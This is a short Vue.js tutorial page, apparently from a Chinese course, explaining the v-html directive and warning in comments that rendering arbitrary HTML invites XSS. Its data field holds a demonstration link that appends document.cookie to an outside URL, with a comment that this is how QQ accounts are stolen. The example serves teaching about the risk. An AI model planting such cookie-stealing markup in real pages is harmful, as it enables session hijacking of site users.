<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title></title>
    <!--引入Vue-->
    <script type="text/javascript" src="./js/vue.js"></script>
</head>

<body>

    <!--
        v-html指令：
        1.作用:向指定节点中渲染包含html结构的内容
        2.与插值语法的区别:
          (1):v-html会替换换掉节点中所有内容，v-html可以识别html的结构

          (2)v-html 有安全性问题:在网站上动态渲染任意html是非常危险的，容易导致kss攻击
           
-->

    <div id="root">
        <div v-html="str"></div>


    </div>
</body>
<script>
    const vm = new Vue({
        el: '#root',
        //QQ账号就是这样被盗的，点击恶意连接偷走你的cookie然后免登录
        data: {
            str: "<a href='https://www.bilibili.com/video/BV1Zy4y1K7SH?p=41?'+document.cookie>找到资源l </a>",
        }
    });
</script>

</html>